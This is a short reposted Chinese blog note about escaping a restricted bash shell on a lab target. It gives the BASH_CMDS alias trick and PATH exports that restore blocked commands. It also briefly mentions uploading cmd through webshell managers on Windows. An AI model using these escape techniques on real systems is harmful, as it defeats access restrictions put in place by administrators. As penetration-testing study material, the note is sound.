碼上快樂
1秒登錄
首頁
榜單
標簽
關於
搜索
相關內容
簡體
繁體
小記如何繞過受限的shell
本文轉載自
查看原文
2020-03-01 21:19
752
web滲透
今天的靶場登陸ssh后發現shell受限,如下
woami都執行不了,查看對應的bin目錄,發現只能執行4個命令
在網上學到一招可以繞過這種受限制的被閹割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash給a變量
/bin/bash
echo $0 #查看腳本本身的名字
echo $? #命令執行結果反饋,0代表執行成功,其余數字表示不成功
export PATH=$PATH:/bin/ #將/bin 作為PATH環境變量導出
export PATH=$PATH:/usr/bin #將/usr/bin作為PATH環境變量導出
執行完上面加粗的四步之后就可以執行所有命令了
Windows中如果遇到此類情形
1.找到一處可上傳文件的位置上傳cmd
2.蟻劍可以自定義cmd的環境變量
使用菜刀同樣上傳cmd文件
設置cmd環境變量 終端輸入 set cmd文件的物理地址
×
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。
猜您在找
xss防御及繞過-小記1
反彈shell受限情況下的倔強
Shell常見用法小記
linux 常用反彈shell小記
Java反彈shell小記(個人學習記錄)
那些年拿過的shell之shiro權限繞過
淺析CTF繞過字符數字構造shell
滲透技巧——如何逃逸Linux的受限制shell執行任意命令
上傳圖片shell繞過過濾的幾種方法
利用shell腳本通過ssh繞過輸入密碼直接登錄主機
粵ICP備18138465號
© 2018-2025 CODEPRJ.COM